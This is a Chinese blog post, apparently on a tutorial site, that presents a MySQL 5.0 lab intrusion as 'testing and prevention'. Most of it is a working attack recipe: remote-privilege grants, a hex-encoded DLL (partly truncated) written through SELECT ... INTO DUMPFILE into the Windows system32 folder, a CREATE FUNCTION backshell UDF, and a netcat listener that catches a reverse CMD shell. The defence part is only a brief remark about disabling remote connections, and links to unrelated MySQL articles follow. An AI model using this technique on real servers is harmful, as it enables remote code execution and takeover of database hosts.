mysql5.0入侵測(cè)試以及防范方法分享
在做了之前的SQL SERVER之后,便很想嘗試一下MYSQL的入侵測(cè)試已經(jīng)防范,與大家一起分享。
總的來說,我一直在用的是MYSQL,對(duì)MYSQL比較熟悉,相比較而言,感覺MYSQL更安全,這只是我自己胡亂猜想的,希望不要引起什么爭(zhēng)論神馬的。。。一本饅頭引發(fā)的血案。。。
正題之一
物理機(jī):Win7
虛擬機(jī):XP
給予mysql遠(yuǎn)程權(quán)限:
grant all privileges on *.* to 數(shù)據(jù)庫(kù)賬號(hào)@給予權(quán)限的IP identified by '數(shù)據(jù)庫(kù)密碼';
flush privileges;
給物理機(jī)遠(yuǎn)程權(quán)限:

物理機(jī)成功連接上:

執(zhí)行侵入測(cè)試前(有圖有真相):

執(zhí)行侵入測(cè)試后(有圖有真相):

重啟前(有圖有真相):

重啟后(有圖有真相):

正題之二:
遠(yuǎn)程登錄之后寫入代碼,代碼在yyd.txt當(dāng)中,然后在MySql中寫入文件:

Win7 打另外一個(gè)cmd,本地端口映射:nc -vv -l -p 端口號(hào)
虛擬機(jī)上:執(zhí)行映射:select backshell("物理機(jī)IP",端口號(hào));
這便執(zhí)行了3306端口反彈CMD
(沒圖了。。。用到了一個(gè)nc軟件執(zhí)行的映射)
yyd.txt大概內(nèi)容:
et @a=concat('',
0x4d5a4b45524e454c33322e444c4c00004c6f61644c696272617279410000000047657450726f63416464726573730000557061636b42794477696e6740000000504500004c010200000000000000000000000000e0000e210b0100360090000000100100000000003d9502000010000000a00000000000100010000000020000040000000000000004000000000000000010030000020000000000000200000000001000001000000000100000100000000000001000000009980200dd020000f19702001400000000c0010090000000000000000000000000000000000000000000000000000000000.........只是部分代碼...............0736875745f6465696e697400736875745f696e697400);
create table yyd(data LONGBLOB);
insert into yyd values("");updateyyd set data = @a;
select data from yyd into DUMPFILE 'c:\\windows\\system32\\yyd.dll';
CREATE FUNCTION backshell RETURNS STRING SONAME 'yyd.dll';
正題之三:
防范

感覺有點(diǎn)亂,主要是分享了兩種方法入侵,但是防范那部分應(yīng)該是XP上的MySql服務(wù)關(guān)閉,但是早XP上做了好多測(cè)試,左后XP被我弄掛掉了。。。。好丟臉,只好把Win7上的MySql服務(wù)拿出來了。
覺得主要還是遠(yuǎn)程連接的問題,“如果MySql不開啟遠(yuǎn)程連接的話我們還是朋友”,開玩笑,如果MySql不開啟遠(yuǎn)程連接的話入侵幾率會(huì)小的很多。
- Mysqlslap MySQL壓力測(cè)試工具 簡(jiǎn)單教程
- MySQL壓力測(cè)試方法 如何使用mysqlslap測(cè)試MySQL的壓力?
- MySQL慢查詢查找和調(diào)優(yōu)測(cè)試
- 使用sysbench來測(cè)試MySQL性能的詳細(xì)教程
- 如何測(cè)試mysql觸發(fā)器和存儲(chǔ)過程
- mysql壓力測(cè)試腳本實(shí)例
- mysql下mysql-udf-http效率測(cè)試小記
- 用sysbench來測(cè)試MySQL的性能的教程
- 用VirtualBox構(gòu)建MySQL測(cè)試環(huán)境的筆記
- MySQL壓測(cè)工具mysqlslap的介紹與使用
相關(guān)文章
MySQL數(shù)據(jù)庫(kù)遠(yuǎn)程訪問權(quán)限如何打開(兩種方法)
本文通過兩種方法給大家介紹MySQL數(shù)據(jù)庫(kù)遠(yuǎn)程訪問權(quán)限的打開方法,非常不錯(cuò),實(shí)用性非常高,感興趣的朋友一起看看吧2016-05-05
mysql數(shù)據(jù)庫(kù)如何求時(shí)間差
這篇文章主要給大家介紹了關(guān)于mysql數(shù)據(jù)庫(kù)如何求時(shí)間差的相關(guān)資料,MySQL提供了許多用于計(jì)算時(shí)間差的函數(shù),可以方便地計(jì)算兩個(gè)時(shí)間之間的時(shí)間差、取出時(shí)間段中的時(shí)間間隔等,需要的朋友可以參考下2023-08-08
詳解Mysql自動(dòng)備份與恢復(fù)的幾種方法(圖文教程)
本篇文章主要介紹了Mysql 自動(dòng)備份與恢復(fù),主要有三種方法,有需要的可以了解一下。2016-11-11
MySQL SUM()帶條件的求和方法與多條件的求和方法解讀
這篇文章主要介紹了MySQL SUM()帶條件的求和方法與多條件的求和方法,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2023-05-05
MySql之授權(quán)用戶權(quán)限如何設(shè)置
這篇文章主要介紹了MySql之授權(quán)用戶權(quán)限如何設(shè)置問題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2023-05-05
MySQL存儲(chǔ)引擎的實(shí)現(xiàn)要素分析
這篇文章主要為大家介紹了MySQL存儲(chǔ)引擎的實(shí)現(xiàn)要素分析,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2023-09-09

